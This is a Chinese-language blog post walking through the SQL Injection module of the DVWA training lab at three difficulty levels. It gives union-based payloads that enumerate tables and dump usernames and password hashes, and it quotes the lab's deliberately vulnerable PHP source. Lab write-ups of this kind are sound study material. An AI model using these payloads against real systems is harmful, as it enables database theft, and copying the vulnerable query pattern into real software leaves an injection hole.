<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/1.jpg">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/1.jpg">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/themes/blue/pace-theme-minimal.css">
  <script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js" integrity="sha256-gqd7YTjg/BtfqWSwsJOvndl0Bxc8gFImLEkXQT8+qj0=" crossorigin="anonymous"></script>

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Mist","darkmode":false,"version":"8.7.1","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":true,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>
<meta name="description" content="DVWA靶场SQL Injection的题解">
<meta property="og:type" content="article">
<meta property="og:title" content="DVWA_SQL Injection">
<meta property="og:url" content="http://example.com/2021/09/19/DVWA_SQL%20Injection/index.html">
<meta property="og:site_name" content="Patrick">
<meta property="og:description" content="DVWA靶场SQL Injection的题解">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img10.360buyimg.com/ddimg/jfs/t1/94476/23/15608/4349/61482605E873214e3/3e9821d8992b6cc0.png">
<meta property="og:image" content="https://img13.360buyimg.com/ddimg/jfs/t1/209112/23/1361/3134/61482606E5a11a15f/1da82b23dd1b7ed1.png">
<meta property="og:image" content="https://img13.360buyimg.com/ddimg/jfs/t1/201866/40/7373/11183/61482605Ebebbfa8f/866835d3ad85ba5c.png">
<meta property="og:image" content="https://img13.360buyimg.com/ddimg/jfs/t1/210011/23/1332/32444/61482605Eb6d68457/49e6d44184fc886d.png">
<meta property="og:image" content="https://img11.360buyimg.com/ddimg/jfs/t1/147350/1/20337/15691/61482605Ef706f838/12c9b0b0a9d0f490.png">
<meta property="og:image" content="https://img13.360buyimg.com/ddimg/jfs/t1/132657/12/23665/4365/61482605E9f37e018/53eeffe577d6b1bd.png">
<meta property="og:image" content="https://img12.360buyimg.com/ddimg/jfs/t1/201401/9/7741/77656/61482606E7a2bd092/3a3abbcb91781622.png">
<meta property="og:image" content="https://img12.360buyimg.com/ddimg/jfs/t1/197147/7/9137/4914/61482605E440f816f/6d71fefd0f05c291.png">
<meta property="og:image" content="https://img10.360buyimg.com/ddimg/jfs/t1/93334/27/19753/861/61482605Ee0c9d610/59986c449dff4ddb.png">
<meta property="og:image" content="https://img14.360buyimg.com/ddimg/jfs/t1/211439/18/1335/3434/61482605E8b07aa25/0206fd913c10cc54.png">
<meta property="article:published_time" content="2021-09-19T13:57:10.000Z">
<meta property="article:modified_time" content="2021-09-20T06:21:11.715Z">
<meta property="article:author" content="Patrick">
<meta property="article:tag" content="DVWA">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img10.360buyimg.com/ddimg/jfs/t1/94476/23/15608/4349/61482605E873214e3/3e9821d8992b6cc0.png">


<link rel="canonical" href="http://example.com/2021/09/19/DVWA_SQL%20Injection/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2021/09/19/DVWA_SQL%20Injection/","path":"2021/09/19/DVWA_SQL Injection/","title":"DVWA_SQL Injection"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>DVWA_SQL Injection | Patrick</title>
  




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">Patrick</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-text">SQL Injection</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-text">low</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-text">Medium</span></a></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-text">high</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Patrick"
      src="/images/1.jpg">
  <p class="site-author-name" itemprop="name">Patrick</p>
  <div class="site-description" itemprop="description">我们生而破碎，用活着来修修补补</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">16</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/Patrick-Qi" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Patrick-Qi" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i></a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:1274941604@qq.com" title="E-Mail → mailto:1274941604@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i></a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.facebook.com/qjy.patrick" title="FB Page → https:&#x2F;&#x2F;www.facebook.com&#x2F;qjy.patrick" rel="noopener" target="_blank"><i class="fab fa-facebook fa-fw"></i></a>
      </span>
  </div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/09/19/DVWA_SQL%20Injection/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/1.jpg">
      <meta itemprop="name" content="Patrick">
      <meta itemprop="description" content="我们生而破碎，用活着来修修补补">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Patrick">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          DVWA_SQL Injection
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2021-09-19 21:57:10" itemprop="dateCreated datePublished" datetime="2021-09-19T21:57:10+08:00">2021-09-19</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2021-09-20 14:21:11" itemprop="dateModified" datetime="2021-09-20T14:21:11+08:00">2021-09-20</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
        </span>
          ，
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/CTF/DVWA/" itemprop="url" rel="index"><span itemprop="name">DVWA</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>4.3k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>4 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>DVWA靶场SQL Injection的题解</p>
<span id="more"></span>

<h1><span id="sql-injection"><center>SQL Injection</center></span></h1><h2><span id="low">low</span></h2><p>先输入1查询，发现可以正常回显，说明数据可以传入后端，然后进行注入测试，输入<code>1&#39;</code>,报错，具体内容如下<br><code>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#39;&#39;1&#39;&#39;&#39; at line 1</code> <br></p>
<p>通过观察可以判断出原SQL语句的闭合形式为：id=’1’，说明’并没有被过滤，所以存在注入。接着再尝试输入’1#’,正常回显，所以我们就可以通过这样子来构造命令对数据库进行查询。<br><br>接着判断列数<br><code>1&#39; order by 1 #</code><br><code>1&#39; order by 2 #</code><br>发现当列数为3的时候报错，说明一共有2列，输入<code>1&#39; union select 1,2</code>得到回显位置<br><img src="https://img10.360buyimg.com/ddimg/jfs/t1/94476/23/15608/4349/61482605E873214e3/3e9821d8992b6cc0.png" alt="1.png"><br>然后就可以查询库名<br><code>1&#39;union select 1,database()</code><br><img src="https://img13.360buyimg.com/ddimg/jfs/t1/209112/23/1361/3134/61482606E5a11a15f/1da82b23dd1b7ed1.png" alt="2.png"><br>得到数据库的名字为dvwa，接着查询表名<code>1&#39;union select 1,table_name from information_schema.tables where table_schema=database()#</code><br><img src="https://img13.360buyimg.com/ddimg/jfs/t1/201866/40/7373/11183/61482605Ebebbfa8f/866835d3ad85ba5c.png" alt="3.png"><br>得到两张表guestbook和users<br>接着可以继续对具体的表进行查询<br><code>1&#39;union select 1,column_name from information_schema.columns where table_name=&#39;users&#39;#</code><br><img src="https://img13.360buyimg.com/ddimg/jfs/t1/210011/23/1332/32444/61482605Eb6d68457/49e6d44184fc886d.png" alt="4.png"><br>发现其中的user和password，可以继续查询<br><code>1&#39; union select user,password from dvwa.users #</code><br><img src="https://img11.360buyimg.com/ddimg/jfs/t1/147350/1/20337/15691/61482605Ef706f838/12c9b0b0a9d0f490.png" alt="5.png"><br>得到用户名密码，密码是通过<a target="_blank" rel="noopener" href="https://www.cmd5.com/">md5</a>加密的，可以在线解密。<br>源代码分析：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">if( isset( $_REQUEST[ &#x27;Submit&#x27; ] ) ) &#123;</span><br><span class="line">    // Get input</span><br><span class="line">    $id = $_REQUEST[ &#x27;id&#x27; ];</span><br><span class="line"></span><br><span class="line">    // Check database</span><br><span class="line">    $query  = &quot;SELECT first_name, last_name FROM users WHERE user_id = &#x27;$id&#x27;;&quot;;</span><br><span class="line">    $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;],  $query ) or die( &#x27;&lt;pre&gt;&#x27; . ((is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_error($GLOBALS[&quot;___mysqli_ston&quot;]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . &#x27;&lt;/pre&gt;&#x27; );</span><br><span class="line"></span><br><span class="line">    // Get results</span><br><span class="line">    while( $row = mysqli_fetch_assoc( $result ) ) &#123;</span><br><span class="line">        // Get values</span><br><span class="line">        $first = $row[&quot;first_name&quot;];</span><br><span class="line">        $last  = $row[&quot;last_name&quot;];</span><br><span class="line"></span><br><span class="line">        // Feedback for end user</span><br><span class="line">        echo &quot;&lt;pre&gt;ID: &#123;$id&#125;&lt;br /&gt;First name: &#123;$first&#125;&lt;br /&gt;Surname: &#123;$last&#125;&lt;/pre&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>可以看到源代码对传入后端的数据没有做任何的过滤，安全性极其脆弱。</p>
<h2><span id="medium">Medium</span></h2><p><img src="https://img13.360buyimg.com/ddimg/jfs/t1/132657/12/23665/4365/61482605E9f37e018/53eeffe577d6b1bd.png" alt="6.png"><br>可以看到，Medium级别取消了输入框，无法通过输入端输入数据，因此我们可以借助burpsuit来抓包<br><img src="https://img12.360buyimg.com/ddimg/jfs/t1/201401/9/7741/77656/61482606E7a2bd092/3a3abbcb91781622.png" alt="7.png"><br>发现报错<br><code>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#39;\&#39;#&#39; at line 1</code>说明’被转义。<br>此处由于数据库不是GBK编码，因此无法通过<a target="_blank" rel="noopener" href="https://www.cnblogs.com/lwfiwo/p/11314408.html">绕过转义符</a>注入。<br>继续注入<code>Submit=Submit&amp;id=1 order by 2 #</code><br>后续具体做法同low<br>源码分析</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">if( isset( $_POST[ &#x27;Submit&#x27; ] ) ) &#123;</span><br><span class="line">    // Get input</span><br><span class="line">    $id = $_POST[ &#x27;id&#x27; ];</span><br><span class="line"></span><br><span class="line">    $id = mysqli_real_escape_string($GLOBALS[&quot;___mysqli_ston&quot;], $id);</span><br><span class="line"></span><br><span class="line">    $query  = &quot;SELECT first_name, last_name FROM users WHERE user_id = $id;&quot;;</span><br><span class="line">    $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;], $query) or die( &#x27;&lt;pre&gt;&#x27; . mysqli_error($GLOBALS[&quot;___mysqli_ston&quot;]) . &#x27;&lt;/pre&gt;&#x27; );</span><br><span class="line"></span><br><span class="line">    // Get results</span><br><span class="line">    while( $row = mysqli_fetch_assoc( $result ) ) &#123;</span><br><span class="line">        // Display values</span><br><span class="line">        $first = $row[&quot;first_name&quot;];</span><br><span class="line">        $last  = $row[&quot;last_name&quot;];</span><br><span class="line"></span><br><span class="line">        // Feedback for end user</span><br><span class="line">        echo &quot;&lt;pre&gt;ID: &#123;$id&#125;&lt;br /&gt;First name: &#123;$first&#125;&lt;br /&gt;Surname: &#123;$last&#125;&lt;/pre&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">// This is used later on in the index.php page</span><br><span class="line">// Setting it here so we can close the database connection in here like in the rest of the source scripts</span><br><span class="line">$query  = &quot;SELECT COUNT(*) FROM users;&quot;;</span><br><span class="line">$result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;],  $query ) or die( &#x27;&lt;pre&gt;&#x27; . ((is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_error($GLOBALS[&quot;___mysqli_ston&quot;]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . &#x27;&lt;/pre&gt;&#x27; );</span><br><span class="line">$number_of_rows = mysqli_fetch_row( $result )[0];</span><br><span class="line"></span><br><span class="line">mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]);</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>
<p>观察发现不用’也行</p>
<h2><span id="high">high</span></h2><p><img src="https://img12.360buyimg.com/ddimg/jfs/t1/197147/7/9137/4914/61482605E440f816f/6d71fefd0f05c291.png" alt="8.png"><br>此选项是对中等难度的扩展，其中包含尝试保护代码的更困难或替代的不良做法。该漏洞可能不允许相同程度的利用，类似于各种“夺旗”（CTF）竞​​赛中的情形。<br>通过点击链接切换id的方法来查询。所以照样通过burpsuit抓包修改数据。输入<code>1&#39;</code>后发现报错基本上没给什么有用的信息<br><img src="https://img10.360buyimg.com/ddimg/jfs/t1/93334/27/19753/861/61482605Ee0c9d610/59986c449dff4ddb.png" alt="9.png"><br>进行其它方法的尝试<br>输入<code>1&#39; %23</code>成功回显<br><img src="https://img14.360buyimg.com/ddimg/jfs/t1/211439/18/1335/3434/61482605E8b07aa25/0206fd913c10cc54.png" alt="10.png"><br>剩下步骤同low与medium<br>源码分析</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">if( isset( $_SESSION [ &#x27;id&#x27; ] ) ) &#123;</span><br><span class="line">    // Get input</span><br><span class="line">    $id = $_SESSION[ &#x27;id&#x27; ];</span><br><span class="line"></span><br><span class="line">    // Check database</span><br><span class="line">    $query  = &quot;SELECT first_name, last_name FROM users WHERE user_id = &#x27;$id&#x27; LIMIT 1;&quot;;</span><br><span class="line">    $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;], $query ) or die( &#x27;&lt;pre&gt;Something went wrong.&lt;/pre&gt;&#x27; );</span><br><span class="line"></span><br><span class="line">    // Get results</span><br><span class="line">    while( $row = mysqli_fetch_assoc( $result ) ) &#123;</span><br><span class="line">        // Get values</span><br><span class="line">        $first = $row[&quot;first_name&quot;];</span><br><span class="line">        $last  = $row[&quot;last_name&quot;];</span><br><span class="line"></span><br><span class="line">        // Feedback for end user</span><br><span class="line">        echo &quot;&lt;pre&gt;ID: &#123;$id&#125;&lt;br /&gt;First name: &#123;$first&#125;&lt;br /&gt;Surname: &#123;$last&#125;&lt;/pre&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    ((is_null($___mysqli_res = mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]))) ? false : $___mysqli_res);        </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>
<p>可以发现与Low级别不一样的是在新页面输入id的值，其值通过<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_42555985/article/details/87939341">session</a>方式存储在服务器端。</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="reward-container">
  <div>大爷赏口冰阔落吧</div>
  <button>
    赞赏
  </button>
  <div class="post-reward">
      <div>
        <img src="/images/wechatpay.png" alt="Patrick 微信">
        <span>微信</span>
      </div>
      <div>
        <img src="/images/alipay.jpg" alt="Patrick 支付宝">
        <span>支付宝</span>
      </div>

  </div>
</div>

          <div class="followme">
  <span>欢迎关注</span>

  <div class="social-list">

      <div class="social-item">
        <a target="_blank" class="social-link" href="/images/wechat_channel.jpg">
          <span class="icon">
            <i class="fab fa-weixin"></i>
          </span>

          <span class="label">WeChat</span>
        </a>
      </div>
  </div>
</div>

          <div class="post-tags">
              <a href="/tags/DVWA/" rel="tag"><i class="fa fa-tag"></i> DVWA</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/09/19/DVWA_File%20Upload/" rel="prev" title="DVWA_File Upload">
                  <i class="fa fa-chevron-left"></i> DVWA_File Upload
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/09/20/DVWA_SQL%20Injection%20(Blind)/" rel="next" title="DVWA_SQL Injection(Blind)">
                  DVWA_SQL Injection(Blind) <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Patrick</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">62k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">57 分钟</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="我的第 undefined 位朋友，">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="历经 undefined 次回眸才与你相遇">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  




  <script src="/js/third-party/pace.js"></script>

  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>



 
<script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/moment.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/moment-precise-range-plugin@1.3.0/moment-precise-range.min.js"></script>
<script>
  function timer() {
    var ages = moment.preciseDiff(moment(),moment(20210915,"YYYYMMDD"));
    ages = ages.replace(/years?/, "年");
    ages = ages.replace(/months?/, "月");
    ages = ages.replace(/days?/, "天");
    ages = ages.replace(/hours?/, "小时");
    ages = ages.replace(/minutes?/, "分");
    ages = ages.replace(/seconds?/, "秒");
    ages = ages.replace(/\d+/g, '<span style="color:#1890ff">$&</span>');
    div.innerHTML = `我已在此等候你 ${ages}`;
  }
  var div = document.createElement("div");
  //插入到copyright之后
  var copyright = document.querySelector(".copyright");
  document.querySelector(".footer-inner").insertBefore(div, copyright.nextSibling);
  timer();
  setInterval("timer()",1000)
</script>

</body>
</html>
